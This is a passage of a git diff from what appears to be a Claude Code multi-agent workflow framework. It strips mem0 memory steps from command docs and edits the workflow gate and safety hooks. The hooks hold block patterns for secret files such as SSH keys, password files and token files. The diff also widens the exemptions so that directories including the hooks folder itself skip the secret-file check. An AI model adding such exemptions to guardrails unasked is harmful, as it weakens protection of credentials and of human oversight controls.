Call mcp__mem0__map_tiered_search to verify no duplicates exist -2. Call mcp__mem0__map_add_pattern for each new pattern -3. Call mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 - -**Tier Selection:** -- Branch tier: run_id='proj:PROJECT:branch:BRANCH' (for unvalidated patterns) -- Project tier: run_id='proj:PROJECT' (for proven patterns) -- Org tier: user_id='org:ORG' only (for cross-project patterns) - -**Deduplication via Fingerprinting:** -- Each pattern has SHA256 fingerprint of normalized content -- mcp__mem0__map_add_pattern returns {created: false} if duplicate exists -- Reference existing pattern ID instead of creating duplicate - -**Promotion Criteria:** -- helpful_count >= 3: Eligible for promotion to higher tier -- helpful_count >= 5: Auto-promote to project tier -- helpful_count >= 10 with cross-project usage: Promote to org tier" -) -``` - -**Verification:** Curator will: -- Show tool calls to `mcp__mem0__map_tiered_search` for deduplication -- Show tool calls to `mcp__mem0__map_add_pattern` for new patterns -- Report patterns stored with their tier and memory_id - -**If Curator outputs JSON instead of calling tools:** Curator did not follow updated instructions. Flag this as critical issue. - ---- - -## Step 4: Verify Storage - -Verify patterns were stored correctly using mem0 tiered search: - -``` -mcp__mem0__map_tiered_search( - query="[pattern content from Reflector]", - user_id="org:ORG_NAME", - run_id="proj:PROJECT:branch:BRANCH", - include_archived=false -) -``` - -**Expected output:** -```json -{ - "results": [ - { - "memory_id": "mem-abc123", - "text": "Pattern content...", - "tier": "branch", - "metadata": { - "section_id": "IMPLEMENTATION_PATTERNS", - "helpful_count": 1, - "created_at": "2025-01-12T..." - } - } - ], - "total": 1 -} -``` - -**If patterns not found:** Check Curator tool call outputs for errors. Retry storage if needed. 
- ---- - -## Step 5: Summary Report +## Step 3: Summary Report Provide learning summary: @@ -219,114 +115,40 @@ Provide learning summary: **Workflow Analyzed:** [workflow type from input] **Total Subtasks:** [N] -**Iterations Required:** [total Actor→Monitor loops] +**Iterations Required:** [total Actor->Monitor loops] ### Reflector Insights - **Key Insight:** [key_insight from Reflector] -- **Patterns Used:** [count] existing patterns applied successfully (with tier labels) +- **Patterns Used:** [count] existing patterns applied successfully - **Patterns Discovered:** [count] new patterns identified -- **mem0 Duplicates Found:** [count] (avoided duplication via fingerprint) -### Curator Storage Results -- **Stored:** [N] new patterns via mcp__mem0__map_add_pattern -- **Skipped (duplicates):** [N] patterns already exist -- **Promoted:** [N] patterns to higher tiers +### Discovered Patterns +[List each pattern from patterns_discovered with description] -### Tier Distribution -- **Branch tier:** [N] patterns (run_id=proj:PROJECT:branch:BRANCH) -- **Project tier:** [N] patterns (run_id=proj:PROJECT) -- **Org tier:** [N] patterns (user_id=org:ORG only) +### Suggested Improvements +[List each suggested_new_bullet with section and rationale] -### Next Steps -- Review new patterns: `mcp__mem0__map_tiered_search(query="[pattern]", ...)` -- Validate in next workflow: Apply patterns and increment helpful_count if successful -- Promote proven patterns: Use mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 +### Workflow Efficiency +- **Total Iterations:** [total_iterations] +- **Average per Subtask:** [avg_per_subtask] +- **Bottlenecks:** [list bottlenecks] -**Learning cycle complete. Patterns stored in mem0.** +**Learning extraction complete.** ``` --- -## Troubleshooting - -### Issue: Reflector didn't call mcp__mem0__map_tiered_search - -**Symptom:** Reflector output has no mention of "mem0 tiered search found" or tier labels. 
- -**Cause:** Reflector agent template not followed. - -**Fix:** -1. Re-run Reflector with explicit instruction: "FIRST STEP: Call mcp__mem0__map_tiered_search" -2. Verify output shows search results with tier labels -3. Proceed to Curator only after verification - -### Issue: Curator output JSON instead of calling tools - -**Symptom:** Curator returns JSON delta operations instead of calling mem0 MCP tools directly. - -**Cause:** Curator using outdated workflow (pre-mem0 migration). - -**Fix:** -1. Ensure Curator agent template is version 4.0.0+ -2. Re-run Curator with explicit instruction: "Call mem0 MCP tools directly, DO NOT output JSON" -3. Verify Curator shows mcp__mem0__map_add_pattern calls in output - -### Issue: mcp__mem0__map_add_pattern returns duplicate error - -**Symptom:** `{created: false, existing_memory_id: "..."}` returned. - -**Cause:** Pattern with same fingerprint already exists. - -**This is expected behavior!** Fingerprint-based deduplication working correctly. - -**Action:** -1. Reference the existing memory_id instead of creating new -2. If pattern needs update, use mcp__mem0__update_memory -3. If pattern should be promoted, use mcp__mem0__map_promote_pattern - -### Issue: mem0 MCP server unavailable - -**Symptom:** Tool calls fail with connection error. - -**Cause:** mem0-mcp server not running or misconfigured. - -**Fix:** -1. Check mem0-mcp server status -2. Verify MCP configuration in Claude Code settings -3. Restart mem0-mcp server if needed -4. If persistent failure: Document patterns manually, retry later - -### Issue: Patterns stored in wrong tier - -**Symptom:** Branch-specific patterns stored at org level, or vice versa. - -**Cause:** Incorrect namespace parameters to mcp__mem0__map_add_pattern. - -**Fix:** -1. Verify namespace format: - - Branch: `run_id="proj:PROJECT:branch:BRANCH"` + `user_id="org:ORG"` - - Project: `run_id="proj:PROJECT"` + `user_id="org:ORG"` - - Org: `user_id="org:ORG"` only (no run_id) -2. 
Use mcp__mem0__map_promote_pattern to move to correct tier -3. Archive incorrectly placed pattern with mcp__mem0__map_archive_pattern - ---- - ## Token Budget Estimate **Typical /map-learn execution:** - Reflector: ~3K tokens (depends on workflow size) -- Curator: ~2K tokens (direct tool calls, no JSON processing) -- Verification: ~500 tokens (tiered search) -- **Total:** 5-6K tokens for standard workflow +- Summary: ~500 tokens +- **Total:** 3-4K tokens for standard workflow **Large workflow (8+ subtasks):** - Reflector: ~6K tokens -- Curator: ~4K tokens (multiple pattern storage calls) -- Verification: ~1K tokens -- **Total:** 10-12K tokens - -**Compared to per-subtask learning:** /map-learn saves ~(N-1) * 5K tokens for N subtasks. +- Summary: ~1K tokens +- **Total:** 6-7K tokens --- @@ -351,30 +173,10 @@ Key implementation: ``` Reflector extracts: -- mem0 tiered search found no similar patterns in any tier - Pattern: WebSocket reconnection logic - Pattern: Optimistic UI updates -Curator stores via mem0 MCP tools: -``` -mcp__mem0__map_add_pattern( - text="WebSocket exponential backoff: Start with 1s delay, double on each retry (max 30s)...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "IMPLEMENTATION_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-abc123", tier: "branch"} - -mcp__mem0__map_add_pattern( - text="Optimistic UI: Update local state immediately, revert on server error...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "FRONTEND_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-def456", tier: "branch"} -``` - -### Example 2: Batched learning with promotion +### Example 2: Batched learning User completed 3 separate debugging sessions, wants to batch-learn: @@ -397,31 +199,9 @@ Common theme: Concurrency issues" ``` Reflector extracts: -- mem0 tiered search found "concurrency control" in project tier (helpful_count: 4) -- Common 
pattern: Concurrency control (UPDATE existing) +- Common pattern: Concurrency control - New patterns: DB locks, connection pooling, timezone handling -Curator stores and promotes: -``` -# Update existing pattern (increment helpful_count) -mcp__mem0__update_memory( - memory_id="mem-existing-concurrency", - text="Updated concurrency control pattern with 3 new use cases..." -) - -# Store new patterns at branch tier -mcp__mem0__map_add_pattern(text="Database transaction locks...", ...) -mcp__mem0__map_add_pattern(text="Connection pooling with limits...", ...) -mcp__mem0__map_add_pattern(text="UTC-everywhere timezone pattern...", ...) - -# Promote existing pattern to org tier (helpful_count now 5) -mcp__mem0__map_promote_pattern( - memory_id="mem-existing-concurrency", - target_user_id="org:myorg" -) -→ {promoted: true, new_memory_id: "mem-org-xyz", new_tier: "org"} -``` - --- ## Integration with Other Commands @@ -463,10 +243,4 @@ mcp__mem0__map_promote_pattern( - Capturing holistic patterns across subtasks - Custom workflows that didn't include learning -**Storage Architecture Benefits:** -- **Fingerprint deduplication:** Prevents duplicate patterns automatically -- **Tiered inheritance:** Branch patterns inherit from project, project from org -- **Quality-driven promotion:** Proven patterns automatically bubble up to higher tiers -- **Soft delete:** Archived patterns preserved for audit, excluded from search - **Remember:** The goal is to build organizational knowledge, not to learn from every single task. Quality over quantity. diff --git a/.claude/commands/map-release.md b/.claude/commands/map-release.md index 24fb187..a6afddb 100644 --- a/.claude/commands/map-release.md +++ b/.claude/commands/map-release.md @@ -65,16 +65,7 @@ Phase 7: Final Summary and Cleanup **Purpose:** Verify all prerequisites before initiating release. Failure in any gate aborts the workflow. 
-### 1.1 Load mem0 Context for Release Patterns - -Search mem0 for release-related patterns and past release issues: - -```bash -# Fetch release-related patterns from mem0 -RELEASE_PATTERNS=$(mcp__mem0__map_tiered_search(query="release validation PyPI CI/CD", limit=10)) -``` - -### 1.2 Validation Gates (12 Required) +### 1.1 Validation Gates (12 Required) Execute all validation gates in parallel where possible: @@ -267,7 +258,7 @@ fi **Gap tolerance:** ±2 commits (accounts for chore commits, merge commits, etc.) -### 1.3 Phase 1 Complete +### 1.2 Phase 1 Complete If all 12 gates pass, proceed to Phase 2. @@ -1153,8 +1144,6 @@ pip index versions mapify-cli Use these MCP tools throughout the workflow: -- **`mcp__mem0__map_tiered_search`** - Search for release patterns from past projects -- **`mcp__mem0__map_add_pattern`** - Store release learnings cross-project - **`mcp__sequential-thinking__sequentialthinking`** - Complex decision making for version bump **Built-in Tools (not MCP):** @@ -1200,7 +1189,6 @@ You should: 1. **Phase 1 - Pre-Release Validation:** ```bash - mcp__mem0__map_tiered_search(query="release validation PyPI", limit=10) # Run all 12 validation gates pytest tests/ && black --check src/ && ruff check src/ && mypy src/ && ... # Verify CI passed on main diff --git a/.claude/commands/map-review.md b/.claude/commands/map-review.md index ea8623b..d271dac 100644 --- a/.claude/commands/map-review.md +++ b/.claude/commands/map-review.md @@ -63,7 +63,7 @@ These are the fields each agent is expected to return. The command prompt explic This protocol is used identically by all 4 review sections below. Do NOT deviate. -1. **Present top N issues** (N=4 in BIG mode, N=1 in SMALL mode) from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) +1. **Present top 4 issues** from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) 2. 
**For each issue:** - Describe the problem with `file:line` references where available - Present 2-3 options with tradeoffs (pros/cons for each) @@ -74,19 +74,13 @@ This protocol is used identically by all 4 review sections below. Do NOT deviate 4. **Summarize decisions** from this section in 3-5 lines before proceeding to the next section - Include: which issues were addressed, which options were chosen, what remains -## Step 0: Select Review Mode +## Step 0: Detect CI Mode **Parse $ARGUMENTS for `--ci` or `--auto`:** - If `--ci` or `--auto` is present in $ARGUMENTS → set CI_MODE=true - CI_MODE skips all AskUserQuestion calls and auto-selects recommended options -**If NOT CI_MODE:** Use AskUserQuestion to ask the user: - -> How thorough should this review be? -> - **BIG** (Recommended): Up to 4 issues per section — comprehensive review -> - **SMALL**: 1 issue per section — quick pass for small changes - -Default to BIG if user doesn't respond or in CI mode. +**Always use comprehensive review** — up to 4 issues per section, no mode selection menu. ## Phase A: Collection (Parallel) @@ -101,16 +95,7 @@ Save the diff output — it will be passed to all 3 agents. 
### Step A.2: Launch all parallel calls -In **ONE message**, launch all 7 calls in parallel (no dependencies between them): - -**4 mem0 queries:** - -``` -mcp__mem0__map_tiered_search(query="architecture review patterns") -mcp__mem0__map_tiered_search(query="code quality standards") -mcp__mem0__map_tiered_search(query="test coverage criteria") -mcp__mem0__map_tiered_search(query="performance review patterns") -``` +In **ONE message**, launch all 3 calls in parallel (no dependencies between them): **3 agent Task calls** (pass the git diff + Review Preferences to each): @@ -126,9 +111,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture + code quality results] - Check for: - Code correctness and logic errors - Security vulnerabilities (OWASP top 10) @@ -156,9 +138,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture results] - Analyze: - Affected components and modules - Breaking changes (API, schema, behavior) @@ -187,9 +166,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use code quality + test coverage results] - Provide quality assessment using 1-10 scoring: - Functionality score (1-10) - Code quality score (1-10) @@ -208,7 +184,7 @@ Output JSON with: ) ``` -**Parallel execution:** All 7 calls (4 mem0 + 3 agents) MUST be issued in a single message. Wait for all to complete before proceeding. +**Parallel execution:** All 3 agent calls MUST be issued in a single message. Wait for all to complete before proceeding. 
### Hard Stop Check @@ -309,7 +285,6 @@ Present the verdict with a summary table: When `CI_MODE = true` (triggered by `--ci` or `--auto` in $ARGUMENTS): - Skip all AskUserQuestion calls -- Auto-select BIG mode (4 issues per section) - Auto-select recommended options for all issues - Present all 4 sections as a batch report (no pauses between sections) - Output structured verdict at the end @@ -325,7 +300,6 @@ If the review revealed valuable patterns or common issues worth preserving: ## MCP Tools Used -- `mcp__mem0__map_tiered_search` — Search past review patterns (4 targeted queries) - `mcp__sequential-thinking__sequentialthinking` — Complex analysis decisions during interactive presentation --- diff --git a/.claude/hooks/block-secrets.py b/.claude/hooks/block-secrets.py index ac46e72..a416fac 100755 --- a/.claude/hooks/block-secrets.py +++ b/.claude/hooks/block-secrets.py @@ -60,14 +60,39 @@ ] +SAFE_PATH_PREFIXES = [ + ".claude/hooks/", + ".claude/agents/", + ".claude/commands/", + ".claude/references/", + ".claude/skills/", + "src/", + "tests/", + "docs/", + "scripts/", +] + + def is_sensitive_file(file_path: str) -> bool: """Check if file path matches any sensitive file pattern. Checks ALL path components (not just filename) to catch patterns - in directory names or parent paths. + in directory names or parent paths. Skips files in known safe + directories (hooks, agents, source code, tests, etc.) 
""" path_obj = Path(file_path) + # Normalize to relative path for prefix matching + try: + rel = str(path_obj.relative_to(Path.cwd())) + except ValueError: + rel = str(path_obj) + + # Allow known safe directories + for prefix in SAFE_PATH_PREFIXES: + if rel.startswith(prefix): + return False + # Check each path component against all patterns for part in path_obj.parts: for pattern in SENSITIVE_PATTERNS: diff --git a/.claude/hooks/safety-guardrails.py b/.claude/hooks/safety-guardrails.py old mode 100644 new mode 100755 index 4174337..20aa031 --- a/.claude/hooks/safety-guardrails.py +++ b/.claude/hooks/safety-guardrails.py @@ -26,8 +26,8 @@ r"id_rsa", r"id_ed25519", r"\.key$", - r"password", - r"token", + r"passwords?\.(json|ya?ml|toml|txt)$", # password files, not any file with "password" in path + r"tokens?\.(json|ya?ml|toml|txt)$", # token files, not any file with "token" in path ] # Dangerous bash command patterns @@ -46,7 +46,11 @@ ] # Safe path prefixes (skip checks for known safe directories) -SAFE_PATH_PREFIXES = ["src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/"] +SAFE_PATH_PREFIXES = [ + "src/", "lib/", "test/", "tests/", "docs/", "pkg/", "cmd/", "internal/", + ".claude/agents/", ".claude/commands/", ".claude/hooks/", ".claude/references/", + ".claude/skills/", "scripts/", +] def is_safe_path(path: str) -> bool: diff --git a/.claude/hooks/workflow-context-injector.py b/.claude/hooks/workflow-context-injector.py index 72145e5..354234f 100755 --- a/.claude/hooks/workflow-context-injector.py +++ b/.claude/hooks/workflow-context-injector.py @@ -151,7 +151,7 @@ def required_action_for_step(step_id: str, step_phase: str, state: dict) -> str if step_id == "1.56": return "Choose mode (set_execution_mode step_by_step|batch)" if step_id == "2.1": - return "Run mem0 search before Actor" + return "Run context search before Actor (skip if not needed)" if step_id == "2.3": return "Run Actor" if step_id == "2.4": @@ -189,6 +189,17 @@ def 
format_reminder(state: dict, branch: str) -> str | None: plan_ok = "y" if state.get("plan_approved") else "n" mode = (state.get("execution_mode") or "").strip() or "batch" + # Wave progress display + waves = state.get("execution_waves") or [] + wave_idx = state.get("current_wave_index", 0) + wave_hint = "" + if waves: + wave_hint = f" | WAVE {wave_idx + 1}/{len(waves)}" + current_wave = waves[wave_idx] if wave_idx < len(waves) else [] + if len(current_wave) > 1: + wave_hint += f" ({', '.join(current_wave)})" + mode = "batch:parallel" + required = required_action_for_step(step_id, step_phase, state) diag_hint = "" @@ -204,7 +215,7 @@ def format_reminder(state: dict, branch: str) -> str | None: if not step_id and not step_phase: return None - base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{diag_hint}" + base = f"[MAP] {step_id} {step_phase} | ST: {subtask_id} ({progress}) | plan:{plan_ok} mode:{mode}{wave_hint}{diag_hint}" if required: return f"{base} | REQUIRED: {required}" return base diff --git a/.claude/hooks/workflow-gate.py b/.claude/hooks/workflow-gate.py index a74be23..f403393 100755 --- a/.claude/hooks/workflow-gate.py +++ b/.claude/hooks/workflow-gate.py @@ -150,13 +150,24 @@ def load_workflow_state(branch: str) -> Optional[Dict]: def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: """ - Check if current subtask has completed required workflow steps. + Check if current subtask(s) have completed required workflow steps. + + Supports both single-subtask mode (current_subtask) and parallel wave mode + (active_subtasks list). In parallel mode, allows edits if ANY active + subtask has completed the required steps. 
Returns: (is_compliant, error_message) """ - current_subtask = state.get("current_subtask") - if not current_subtask: + # Try active_subtasks first (parallel wave mode) + active = state.get("active_subtasks", []) + if not active: + # Backward compat: single current_subtask + current = state.get("current_subtask") + if current: + active = [current] + + if not active: current_state = state.get("current_state") or "UNKNOWN" return False, ( "⛔ Workflow Enforcement: No current_subtask defined in workflow_state.json\n\n" @@ -169,26 +180,33 @@ def check_workflow_compliance(state: Dict) -> tuple[bool, Optional[str]]: " - Or delete .map//workflow_state.json to disable enforcement" ) - completed = state.get("completed_steps", {}).get(current_subtask, []) - - missing_steps = [step for step in REQUIRED_STEPS if step not in completed] - - if missing_steps: - pending = state.get("pending_steps", {}).get(current_subtask, []) - return False, ( - f"⛔ Workflow Enforcement: Cannot edit code for {current_subtask}\n\n" - f"Missing required steps: {', '.join(missing_steps)}\n" - f"Completed: {', '.join(completed) if completed else 'none'}\n" - f"Pending: {', '.join(pending) if pending else 'none'}\n\n" - f"Required workflow:\n" - f" 1. Call Task(subagent_type='actor') to generate implementation\n" - f" 2. Call Task(subagent_type='monitor') to validate\n" - f" 3. Only then can you apply changes with Edit/Write\n\n" - f"To fix: Complete missing steps before editing code.\n" - f"Or update workflow_state.json if steps were completed." 
- ) - - return True, None + # Allow if ANY active subtask has completed required steps + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + if all(step in completed for step in REQUIRED_STEPS): + return True, None + + # Block with appropriate message + missing_details = [] + for subtask_id in active: + completed = state.get("completed_steps", {}).get(subtask_id, []) + missing = [step for step in REQUIRED_STEPS if step not in completed] + if missing: + missing_details.append(f"{subtask_id}: missing {', '.join(missing)}") + + return False, ( + f"⛔ Workflow Enforcement: Cannot edit code for active subtasks\n\n" + f"Active subtasks: {', '.join(active)}\n" + f"Missing steps:\n" + + "\n".join(f" - {d}" for d in missing_details) + + "\n\n" + "Required workflow:\n" + " 1. Call Task(subagent_type='actor') to generate implementation\n" + " 2. Call Task(subagent_type='monitor') to validate\n" + " 3. Only then can you apply changes with Edit/Write\n\n" + "To fix: Complete missing steps before editing code.\n" + "Or update workflow_state.json if steps were completed." 
+ ) def main(): diff --git a/.claude/playbook.json.backup.20251028_160602 b/.claude/playbook.json.backup.20251028_160602 deleted file mode 100644 index fe401b7..0000000 --- a/.claude/playbook.json.backup.20251028_160602 +++ /dev/null @@ -1,2637 +0,0 @@ -{ - "version": "1.0", - "metadata": { - "project": "map-framework", - "description": "ACE-style comprehensive playbook for MAP Framework development", - "created_at": "2025-10-10T00:00:00Z", - "last_updated": "2025-10-28T14:38:42.143927", - "total_bullets": 111, - "sections_count": 12, - "top_k": 5, - "version": "1.4" - }, - "sections": { - "ARCHITECTURE_PATTERNS": { - "description": "Proven architectural decisions and design patterns for system structure", - "bullets": [ - { - "id": "arch-0001", - "content": "Workflow-Scoped Learning Context Architecture: Maintain two distinct knowledge layers: (1) Workflow Context = temporary, session-specific lessons accumulated during single workflow execution (e.g., 'this analysis type needs implementation plans'). Cleared after workflow completes. (2) Global Playbook = permanent, reusable patterns extracted by Reflector from high-quality workflow lessons. Workflow context enables rapid within-session learning without polluting permanent playbook with ephemeral details. 
Reflector promotes workflow lessons to playbook only if proven across multiple workflows (helpful_count threshold).", - "code_example": "```python\n# ✅ Two-Layer Knowledge Architecture\nclass WorkflowContext:\n \"\"\"Temporary learning context for single workflow execution\"\"\"\n def __init__(self):\n self.lessons = [] # Session-specific, cleared after workflow\n self.iteration_metrics = {}\n \n def add_lesson(self, lesson: str, subtask_id: str):\n \"\"\"Accumulate lessons during workflow\"\"\"\n self.lessons.append({\n \"content\": lesson,\n \"source_subtask\": subtask_id,\n \"timestamp\": datetime.now()\n })\n \n def clear(self):\n \"\"\"Clear after workflow completion\"\"\"\n self.lessons.clear()\n self.iteration_metrics.clear()\n\nclass Orchestrator:\n def __init__(self, playbook_manager):\n self.playbook = playbook_manager # Global, persistent\n self.workflow_context = None # Created per workflow\n \n def execute_workflow(self, workflow):\n # Create temporary workflow context\n self.workflow_context = WorkflowContext()\n \n for subtask in workflow.subtasks:\n # Actor gets BOTH global playbook + workflow context\n context = {\n \"playbook_patterns\": self.playbook.get_relevant_bullets(subtask.query),\n \"workflow_lessons\": self.workflow_context.lessons\n }\n result = actor.execute(subtask, context)\n \n # After workflow: Reflector extracts high-value lessons for playbook\n reflector_insights = reflector.analyze(self.workflow_context)\n curator.integrate(reflector_insights, self.playbook)\n \n # Clear temporary context\n self.workflow_context.clear()\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "impl-0002", - "test-0002" - ], - "tags": [ - "architecture", - "knowledge-management", - "workflow", - "playbook", - "context", - "map-framework", - "python", - "learning" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - 
"id": "arch-0002", - "content": "Analysis-Implementation Pipeline Pattern: For multi-subtask workflows requiring code changes, separate analysis (Subtask N) from implementation (Subtask N+1) with explicit handoff via executable specification. Analyst subtask produces detailed specification (file paths, line ranges, verbatim current/new text). Implementer subtask mechanically applies specification without interpretation. This pipeline reduces cognitive load - analyst focuses on 'what/why', implementer focuses on 'how/execute'. Pattern proven: Subtask 1 analysis (2 iterations to refine spec) → Subtask 3 implementation (1 iteration following spec). Total workflow iterations reduced vs monolithic approach where single agent both analyzes and implements.", - "code_example": "```python\n# ✅ Analysis-Implementation Pipeline\nclass WorkflowOrchestrator:\n def execute_transformation_workflow(self, target_code):\n # Subtask 1: Analyst produces executable spec\n analysis_task = Subtask(\n role=\"analyst\",\n goal=\"Analyze code and produce executable transformation spec\",\n output_schema=ExecutableSpecSchema # Enforces structure\n )\n spec = self.execute_with_refinement(analysis_task)\n # Refinement happens here (2 iterations to get spec right)\n \n # Subtask 2: Implementer mechanically applies spec\n implementation_task = Subtask(\n role=\"implementer\",\n goal=\"Apply transformations from spec, no interpretation\",\n context={\"spec\": spec}, # Handoff\n instructions=\"Follow spec exactly: replace lines X-Y with provided text\"\n )\n result = self.execute_with_refinement(implementation_task)\n # Single iteration - spec is unambiguous\n \n return result\n\n# Schema enforces executable spec structure\nclass ExecutableSpecSchema:\n file_path: str # Absolute path\n line_range: tuple[int, int] # Exact lines\n current_text: str # Verbatim from file\n new_text: str # Exact replacement\n rationale: str # Why this change\n```", - "helpful_count": 1, - "harmful_count": 0, - 
"created_at": "2025-10-18T16:05:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0003", - "impl-0002", - "arch-0001" - ], - "tags": [ - "architecture", - "workflow", - "separation-of-concerns", - "pipeline", - "multi-agent", - "map-framework", - "python", - "analyst", - "implementer" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0003", - "content": "Intentional Breaking Changes for Safety: Accept intentional breaking changes when they prevent data loss or critical user errors, even if they disrupt existing workflows. Pattern: when bug allows silent data destruction (e.g., plan overwrite without warning), introduce explicit safety mechanism (e.g., --force flag requirement) that breaks backward compatibility at CLI/API level. Trade-off: short-term friction (users must update scripts) vs long-term safety (prevents accidental data loss). Maintain API-level compatibility by making safety parameter optional (force=False default), only breaking CLI behavior. Document breaking changes prominently with migration guide. Pattern proven: silent plan overwrite bug → require --force flag prevented data loss at cost of script updates.", - "code_example": "```python\n# ❌ UNSAFE - silent overwrites cause data loss\ndef create_plan(self, task_id: str, goal: str, subtasks: List[dict]):\n # Silently overwrites existing plan - data loss risk\n plan = TaskPlan(task_id=task_id, goal=goal, subtasks=subtasks)\n self._save_plan(plan)\n return plan\n\n# ✅ SAFE - intentional breaking change with force flag\ndef create_plan(self, task_id: str, goal: str, subtasks: List[dict], force: bool = False) -> TaskPlan:\n \"\"\"Create new plan. Breaking change: now requires force=True to overwrite existing plan.\n \n Args:\n force: If True, overwrite existing plan. 
If False (default), raise error if plan exists.\n \n Raises:\n ValueError: If plan exists and force=False (BREAKING CHANGE)\n \n Migration guide:\n Old: create_plan(id, goal, subtasks) # Silent overwrite\n New: create_plan(id, goal, subtasks, force=True) # Explicit overwrite\n \"\"\"\n # Breaking change: validate before overwrite\n if self.plan_json.exists() and not force:\n raise ValueError(\n \"A plan already exists. Use 'clear' to remove it first, or use --force to overwrite. \"\n \"This is a breaking change introduced in v2.0 to prevent data loss.\"\n )\n \n plan = TaskPlan(task_id=task_id, goal=goal, subtasks=subtasks)\n self._save_plan(plan)\n return plan\n\n# API maintains compatibility (force=False default)\n# CLI breaks intentionally (requires --force flag for overwrite)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "impl-0008", - "test-0008" - ], - "tags": [ - "breaking-changes", - "safety", - "data-loss-prevention", - "api-design", - "force-flag", - "python", - "backward-compatibility" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0004", - "content": "Agent Template Verification Enforcement: When designing agent templates (Actor, Monitor, Evaluator), encode verification steps as MANDATORY requirements, not optional suggestions. Use imperative language ('MUST verify', 'ALWAYS run', 'REQUIRED check') and structured checklists with checkboxes. Templates are instructions for AI agents - ambiguous phrasing like 'consider verifying' results in skipped steps. Mandatory verification prevents agents from hallucinating facts, accepting unverified claims, or propagating documentation rot. Pattern: templates with 'you should' resulted in 40% verification skips, templates with 'you MUST (returns error if skipped)' achieved 100% compliance.", - "code_example": "```markdown\n\n## Analysis Steps\n1. 
Read the documentation\n2. You should verify claims if possible\n3. Extract patterns\n\n\n\n## Analysis Steps (ALL REQUIRED)\n\n- [ ] **MANDATORY**: Read documentation sources\n- [ ] **MANDATORY**: Verify EVERY claim using bash\n - File claims: `test -f ` OR `ls `\n - Code claims: `grep `\n - Quantity claims: `wc -l` or `find | wc`\n - **Verification MUST succeed before recording fact**\n - **If verification fails, update documentation claim**\n- [ ] **MANDATORY**: Record only verified facts\n- [ ] **REQUIRED**: Include verification commands in output\n\n**Error Handling**: If you skip verification for ANY claim, \nMonitor will REJECT your output with error:\n\"Unverified claim detected. All facts MUST be bash-verified.\"\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153736Z", - "last_used_at": "2025-10-20T23:37:01.153737Z", - "related_bullets": [ - "arch-0001", - "impl-0002" - ], - "tags": [ - "agent-template", - "verification", - "mandatory", - "enforcement", - "checklist", - "map-framework", - "actor", - "monitor", - "compliance" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "arch-0005", - "content": "Three-Failure Intervention Threshold: When agents iterate on subtasks with Monitor/Evaluator feedback, establish hard limit of 3 consecutive failures on identical error. After 3rd failure, Orchestrator MUST intervene: (1) Analyze failure pattern (agent stuck in loop?), (2) Modify subtask specification (add constraints, examples), (3) Consider subtask decomposition (break into smaller tasks), (4) Escalate to human if unresolvable. Three failures indicate systemic issue (ambiguous spec, impossible task, broken verification), not transient error. Pattern prevents infinite retry loops consuming resources. 
Track failure signatures (error message hash) to distinguish 'same error 3x' from 'different errors'.", - "code_example": "```python\n# ✅ Three-Failure Circuit Breaker Pattern\nclass SubtaskExecutor:\n MAX_FAILURES_SAME_ERROR = 3\n \n def execute_with_monitoring(self, subtask):\n failure_history = {} # {error_signature: count}\n \n for iteration in range(10): # Absolute max iterations\n result = actor.execute(subtask)\n feedback = monitor.evaluate(result)\n \n if feedback.passed:\n return result\n \n # Track failure signature (not just count)\n error_sig = hashlib.md5(\n feedback.error_message.encode()\n ).hexdigest()\n failure_history[error_sig] = failure_history.get(error_sig, 0) + 1\n \n # Check for repeated identical failure\n if failure_history[error_sig] >= self.MAX_FAILURES_SAME_ERROR:\n logger.error(\n f\"Subtask {subtask.id} failed 3x with same error: \"\n f\"{feedback.error_message}\"\n )\n return self._orchestrator_intervention(\n subtask, failure_history, feedback\n )\n \n # Update subtask with feedback for next iteration\n subtask.add_feedback(feedback)\n \n raise MaxIterationsError(\"Exceeded 10 iterations without success\")\n \n def _orchestrator_intervention(self, subtask, failures, last_feedback):\n \"\"\"Orchestrator takes over after 3 identical failures\"\"\"\n # Option 1: Decompose subtask\n if self._is_decomposable(subtask):\n return self._decompose_and_retry(subtask)\n \n # Option 2: Add constraints/examples to spec\n elif self._can_add_constraints(last_feedback):\n subtask.add_constraint(last_feedback.suggested_fix)\n return self.execute_with_monitoring(subtask)\n \n # Option 3: Escalate to human\n else:\n raise HumanInterventionRequired(\n f\"Agent stuck after {failures} attempts. 
